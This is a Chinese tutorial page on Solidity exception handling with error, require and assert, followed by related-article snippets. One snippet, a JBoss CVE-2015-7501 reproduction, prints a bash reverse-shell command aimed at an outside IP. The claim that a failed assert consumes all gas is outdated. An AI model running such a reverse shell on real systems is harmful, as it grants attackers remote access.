Solidity智能合约中的异常处理(error、require 和 assert)

Solidity 中的三种抛出异常方法:errorrequireassert


在 Solidity 开发中,异常处理是确保智能合约安全性和正确性的关键步骤。Solidity 提供了三种主要方法来抛出异常:errorrequireassert。本文将详细介绍这三种方法的用途、实现方式及其各自的特点,并对它们的 Gas 消耗进行比较。


目录

  1. Solidity 中的异常处理
    1.1 什么是异常?
    1.2 异常处理的必要性
    1.3 Solidity 异常的常见场景

  2. error:自定义错误
    2.1 error 的定义
    2.2 error 的使用场景
    2.3 error 的语法
    2.4 error 的Gas消耗

  3. require:前置条件检查
    3.1 require 的作用
    3.2 require 的语法
    3.3 require 的常见使用场景
    3.4 require 的 Gas 消耗

  4. assert:不变量检查
    4.1 assert 的作用
    4.2 assert 的语法
    4.3 assert 的使用场景
    4.4 assert 的 Gas 消耗

  5. 三者的对比与最佳实践
    5.1 功能对比
    5.2 安全性对比
    5.3 Gas 消耗对比

  6. 总结

在这里插入图片描述

1. Solidity 中的异常处理

1.1 什么是异常?

异常是指在程序运行过程中发生的不正常或意外的情况。在 Solidity 中,异常通常指程序遇到错误条件时的中断执行。

1.2 异常处理的必要性

在智能合约中,异常处理的目标是确保交易不会在有错误的情况下继续执行,以防止状态被意外更改或资金被错误转移。

1.3 Solidity 异常的常见场景

  • 用户输入不合法(如溢出、负值等)
  • 外部合约调用失败
  • 合约逻辑中的不变量遭到破坏
  • 资金不足或无法执行转账

2. error:自定义错误

2.1 error 的定义

error 是 Solidity 0.8.4 版本引入的新特性,允许开发者定义自定义错误。自定义错误为错误报告提供了更多的灵活性,并且能够节省 Gas。

2.2 error 的使用场景

自定义错误主要用于需要抛出特定的异常并提供更详细的错误信息的场景。它相比传统的异常处理方式,可以节省 Gas,尤其是在复杂合约中。

2.3 error 的语法

// 定义错误
error InsufficientBalance(uint requested, uint available);

contract Token {
    function withdraw(uint amount) public {
        if (amount > address(this).balance)
            revert InsufficientBalance({
                requested: amount,
                available: address(this).balance
            });
        // 继续执行其他逻辑
    }
}

2.4 error 的Gas消耗

使用 error 定义自定义错误时,相比 requireassert,通常会节省更多的 Gas,尤其是当错误需要包含复杂数据时。由于错误消息不作为字符串存储,它的处理更加高效。


3. require:前置条件检查

3.1 require 的作用

require 用于在合约执行之前检查某些条件是否成立,通常用于验证输入参数或外部合约调用结果。

3.2 require 的语法

function transfer(address recipient, uint amount) public {
    require(amount <= balance, "Insufficient balance");
    // 执行转账
}

3.3 require 的常见使用场景

  • 检查调用方是否具有足够的权限
  • 验证输入数据的合法性
  • 验证外部合约的返回值

3.4 require 的 Gas 消耗

require 语句会消耗一定的 Gas,但由于 require 在条件不满足时立即中断执行,未使用的 Gas 会被退还。因此,require 适合用于条件检查时。


4. assert:不变量检查

4.1 assert 的作用

assert 用于检查代码逻辑中的不变量,即程序在任何时候都应该满足的条件。如果 assert 失败,意味着代码中存在致命的错误。

4.2 assert 的语法

uint x = 0;

function increment() public {
    x += 1;
    assert(x > 0); // 确保 x 永远大于 0
}

4.3 assert 的使用场景

  • 用于捕捉代码中的严重错误,特别是不应该发生的逻辑错误。
  • 检查合约中的状态是否在预期范围内。

4.4 assert 的 Gas 消耗

assert 失败时会消耗所有剩余的 Gas,因为它通常用来捕捉不可预见的严重错误。因此,应慎用 assert,只在关键性逻辑的检查中使用。


5. 三者的对比与最佳实践

5.1 功能对比

  • error 提供了更灵活的错误报告机制,适合复杂错误处理。
  • require 适用于输入验证和外部合约结果检查。
  • assert 主要用于捕获不可预见的内部错误或逻辑漏洞。

5.2 安全性对比

  • errorrequire 通常用于用户或合约交互时的错误检查。
  • assert 应用于确保内部逻辑的不变量,更多用于调试目的。

5.3 Gas 消耗对比

  • error:节省 Gas,尤其是复杂的错误处理。
  • require:较为高效,未使用的 Gas 可退还。
  • assert:在失败时消耗所有 Gas,应用场景更局限。

6. 总结

Solidity 提供了 errorrequireassert 三种异常处理方式,每种方式都有其特定的应用场景。开发者应根据合约的实际需求和安全性要求,选择适合的异常处理机制。此外,Gas 消耗的比较也提示我们在大多数情况下,应优先使用 require 进行输入检查,使用 error 进行复杂错误处理,而 assert 应仅用于关键性的不变量检查。


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/885304.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

算法:按既定顺序创建目标数组

力扣1389 提示&#xff1a; 1 < nums.length, index.length < 100nums.length index.length0 < nums[i] < 1000 < index[i] < i 题解&#xff1a; class Solution {public int[] createTargetArray(int[] nums, int[] index) {int[] target new int[num…

有关若依菜单管理的改造

导言&#xff1a; 搞了个后端对接若依前端&#xff0c;对接菜单管理时候懵懵的就搞完了&#xff0c;也是搞了很久。记一下逻辑和要注意的东西&#xff0c;以后做想似的能有个改造思路。 逻辑&#xff1a; 主要是要把后端传过的数组列表做成类似 这样的&#xff0c;所以要转格式…

心理咨询行业为何要有自己的知识付费小程序平台 心理咨询小程序搭建 集师saas知识付费小程序平台搭建

在快节奏的现代生活中&#xff0c;心理健康问题日益凸显&#xff0c;心理咨询行业迎来了前所未有的发展机遇。然而&#xff0c;传统咨询模式受限于地域、时间等因素&#xff0c;难以满足日益增长的多元化需求。在此背景下&#xff0c;搭建自己的知识付费小程序&#xff0c;成为…

【MWORKS专业工具箱系列教程】控制系列工具箱第四期:时域分析

本工具箱教程以控制系统模型创建、分析与设计流程为主线&#xff0c;通过大量示例介绍MWORKS控制系统工具箱的功能和具体使用。共计10篇文章&#xff0c;上一篇主要介绍了控制系统连接与化简。 同元软控&#xff1a;【MWORKS专业工具箱系列教程】控制系 列工具箱第三期&#x…

IT基础监控范围和对象

监控易作为一款由美信时代独立自主研发的分布式一体化集中监控平台&#xff0c;其监控范围极为广泛&#xff0c;几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。以下是对监控易监控范围的详细介绍&#xff1a; 一、IT基础资源监控 服务器硬件监控&#xff1a;监控易支…

【宝藏篇】加密软件有哪些?10款好用的加密软件推荐!

小明&#xff1a;嘿&#xff0c;小华&#xff0c;你知道有哪些好用的加密软件吗&#xff1f;我最近需要保护一些敏感数据。 小华&#xff1a;当然&#xff0c;小明&#xff01;现在市场上有很多优秀的加密软件&#xff0c;可以帮助你保护数据安全。我正好有10款宝藏级的加密软件…

Tableau|一入门

一 什么是BI工具 BI 工具即商业智能&#xff08;Business Intelligence&#xff09;工具&#xff0c;是一种用于收集、整理、分析和展示企业数据的软件系统&#xff0c;其主要目的是帮助企业用户更好地理解和利用数据&#xff0c;以支持决策制定。 主要功能&#xff1a; 1.数据…

【数据结构中的哈希】

泛黄的春联还残留在墙上.......................................................................................................... 文章目录 前言 一、【哈希结构的介绍】 1.1【哈希结构的概念】 1.2【哈希冲突】 1.3【哈希函数的设计】 1.4【应对哈希冲突的办法】 一、…

工厂模式和抽象工厂模式的实验报告

1. 实验结果&#xff1a; 记录并附上不同模型对象&#xff08;例如&#xff1a;士兵、机器人、骑士&#xff09;的展示效果截图。 2. 性能分析&#xff1a; 记录并比较抽象工厂模式与直接实例化的性能测试结果&#xff0c;分析它们在不同数量级对象创建时的开销与效益。 2.1…

集运公司如何怎么利用系统开展营销活动?

在当前集运市场激烈竞争的背景下&#xff0c;企业如何通过有效的营销策略脱颖而出&#xff0c;成为行业佼佼者&#xff1f;易境通集运系统以其强大的营销功能和工具&#xff0c;为集运企业提供了全新的营销解决方案。以下是如何利用该系统开展营销活动的具体策略。 1.积分卡券&…

Jupyter的使用分享

文章目录 碎碎念安装方法1.安装Anaconda方法2.通过库的安装方式 启动使用教程1.指定目录打开2.启动后的简单使用 小结 碎碎念 前情提示 之前与许多小伙伴交流的时候&#xff0c;发现大家对于pycharm更容易上手&#xff08;可能是比较好设置中文的原因&#xff09;&#xff0c;在…

MySQL扩展

一、慢查询&#xff08;慢日志&#xff09; 默认关闭的 定位慢SQL 简单&#xff1a;show profile&#xff0c;启用时会对服务器的性能产生额外的负担 -- 启用性能监控 mysql> set profiling1;-- 执行SQL mysql> SELECT * from member-- 性能分析 mysql> show p…

基于卷积神经网络的体育运动项目分类识别系统

温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长 QQ 名片 :) 1. 项目简介 随着计算机视觉和深度学习技术的快速发展&#xff0c;利用先进的图像处理技术对体育运动进行智能分类与识别已成为研究热点。传统的运动分析方法通常依赖于人工观察和记录&#xff0c;耗时耗力且容…

AndroidLogger插件使用技巧

它是一个Notepad插件&#xff0c;由于未上架Notepad的插件市场&#xff0c;因此需要独立下载并解压到 Notepad 安装目录下 plugin 里面即可。已更新到 SourceForge&#xff0c;您可以到那里获取最新的包&#xff0c;目前还在持续升级。 https://sourceforge.net/projects/andro…

网站建设中,常用的后台技术有哪些,他们分别擅长做什么网站平台

PHP、Python、JavaScript、Ruby、Java和.NET各自适用于不同类型的网站平台。以下是对这些编程语言适用场景的具体介绍&#xff1a; PHP Web开发&#xff1a;PHP是一种广泛使用的开源服务器端脚本语言&#xff0c;特别适合Web开发。全球有超过80%的网站使用PHP作为服务器端编程语…

执行力怎么培养?

执行力怎么培养&#xff1f; 并行&#xff1a;适合在初期养成习惯&#xff0c;不抱对结果的期望天才就是强迫症&#xff1a;适合中期修身&#xff1a;适合高级 并行&#xff1a;适合在初期养成习惯&#xff0c;不抱对结果的期望 在你开始做任何事情的时候&#xff0c;不要一开…

游戏找不到xinput1_3.dll的原因及解决方法

1. xinput1_3.dll 基本信息 1.1 文件名 xinput1_3.dll 是一个动态链接库&#xff08;DLL&#xff09;文件&#xff0c;它属于 Microsoft DirectX for Windows 的一部分。这个文件主要负责处理与 Xbox 360 控制器和其他兼容 XInput 标准的游戏手柄相关的输入信号&#xff0c;确…

【Python调用ddddocr打包成exe文件指定模型库及注意事项】

ddddocr 打包成 exe 后一直存在各种各样的问题&#xff0c;例如&#xff1a; ddddocr\common.onnx failed. File doesn’t exist 查阅资料后&#xff0c;问题得到解决。但相关资料不多&#xff0c;且不够详细&#xff0c;特写下本文&#xff0c;以便于后来者解决问题。 希望本文…

JBOSS中间件漏洞复现

CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…

CPU大端和小端的判断:【两种方法+源代码】

1&#xff1a;为什么会出现大小端 在计算机系统中&#xff0c;数据是以字节为单位进行存储的。每个地址单元都对应着一个字节&#xff0c;一个字节为8位&#xff08;bit&#xff09;。然而&#xff0c;在C语言等编程语言中&#xff0c;除了8位的char类型外&#xff0c;还有16位…